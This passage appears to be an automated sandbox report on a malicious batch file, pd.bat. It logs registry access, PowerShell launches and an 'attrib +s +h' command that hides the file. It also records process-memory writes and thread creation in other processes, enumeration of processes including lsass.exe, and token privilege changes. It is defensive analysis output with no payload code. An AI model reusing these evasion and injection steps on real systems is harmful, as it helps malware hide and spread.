HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 ILUsageMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 NIUsageMask

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default Latest

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default LegacyPolicyTimeStamp

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default index17

HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine ApplicationBase

HKLM\Software\Microsoft\Windows NT\CurrentVersion InstallationType

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options DevOverrideEnable

HKLM\System\CurrentControlSet\Control\Session Manager\Environment PSMODULEPATH

Process Operations: 78

Process Created

Process Name Module

"c:\users\administrator\documents\pd.bat"

"c:\users\admini~1\docume~1\pd.bat"
"c:\users\administrator\documents\pd.bat"

"c:\windows\system32\attrib.exe" +s +h pd.bat

{00021401-0000-0000-C000-000000000046}

{1F3427C8-5C10-4210-AA03-2EE45287D668}

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}

{25CD009F-FFBF-418A-8E11-7A877CAFCAF5}

{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}

{50EE5B75-5635-11D1-AC2A-D4EA0B000000}

{55C7A567-7B90-4885-9EDD-662D359ED389}

{603D3801-BD81-11D0-A3A5-00C04FD706EC}

{660B90C8-73A9-4B58-8CAE-355B7F55341B}

{6C467336-8281-4E60-8204-430CED96822D}

{6D49AC84-BEAD-11D1-A074-
0080C740BFBD}

{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}

{7353C207-C0DA-45A1-93CC-47A853A736A1}

{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}

{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}

{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}

{8F170678-2A97-4D59-89A1-7A0A71C1B677}

{90AA3A4E-1CBA-4233-B8BB-535773D48449}

{A2A9545D-A0C2-42B4-9708-
A0B2BADD77C8}

{DD313E04-FEFF-11D1-8ECD-0000F87A470C}

{E0629351-6F81-11D2-973F-00104B9B172F}

{E97F7176-7C91-4648-A0CE-94F37BF016F8}

{EFDB41B0-5538-42F1-995B-460DA31C0924}

{F3364BA0-65B9-11CE-A9BA-00AA004AE837}

{F5078F32-C551-11D3-89B9-0000F81FE221}

Process Opened

Process Name/Address PID/Process Name

Executed a shell command


c:\users\administrator\documents\pd.bat

powershell.exe QueryInformation

Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite
powershell.exe
& DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation

powershell.exe VMRead & QueryInformation

Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite
searchindexer.exe
& DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation

Process killed

Ended itself and all of its threads

Thread Created

72fe9a9f

73078014

Other

Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_Read

Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_ReadWrite

Changed the protection attribute of process address: 0x72f12be4, new attribute: Execute_ReadWrite

Decremented a thread's suspend count

Determined whether the specified process is running under WOW64

Enabled an application to supersede the top-level exception handler

Enum Process Name: armsvc.exe

Enum Process Name: audiodg.exe

Enum Process Name: cmd.exe

Enum Process Name: conhost.exe

Enum Process Name: csrss.exe

Enum Process Name: dwm.exe

Enum Process Name: excel.exe

Enum Process Name: explorer.exe

Enum Process Name: fxsction32.exe

Enum Process Name: lsass.exe

Enum Process Name: lsm.exe

Enum Process Name: mdm.exe

Enum Process Name: powershell.exe

Enum Process Name: schtasks.exe

Enum Process Name: searchindexer.exe

Enum Process Name: services.exe

Enum Process Name: smss.exe

Enum Process Name: spoolsv.exe

Enum Process Name: svchost.exe

Enum Process Name: system

Enum Process Name: taskhost.exe

Enum Process Name: tlntsvr.exe


Enum Process Name: wininit.exe

Enum Process Name: winlogon.exe

Enum Process Name: wmiprvse.exe

Enum Process Name: wsqmcons.exe

Initialized COM library for the current thread and set it in the concurrency mode

Obtained the contents of the specified variable from the environment block of the calling process

Obtained the identifier of the thread or process that created the specified window

Obtained the priority value for a thread

Opened the access token associated with a process

Opened the access token associated with a thread

Queried the activation context

Retrieved system information

Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Set the priority value for a thread

Network Operations: 3

Socket Activities

Closed the socket

Controlled the I/O mode of the newly created socket

Initiated WS2_32 socket DLL

Other Operations: 17

Signal Objects

Mutex-Object Name

Opened an existing named event object

global\.net clr networking

global\cordbipcsetupsyncevent_2532

global\cordbipcsetupsyncevent_2540

global\cordbipcsetupsyncevent_2548

global\cordbipcsetupsyncevent_2804

global\cordbipcsetupsyncevent_2808

Others

Allocated and initialized a security identifier (SID)

Converted a string-format security descriptor into a valid, functional security descriptor

Determined whether a specified security identifier (SID) is enabled in an access token

Enabled/disabled privileges in an access token

Expanded environment-variable strings and replace them with the values defined for the current use

Initialized a new security descriptor

Obtained information about an access token

Recorded system information

Retrieved the user's logon name

Set information in a security discretionary access control list (DACL)

McAfee Active Response

Status: Product is not Available

© 2020 McAfee, LLC. All rights reserved.


© 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

You might also like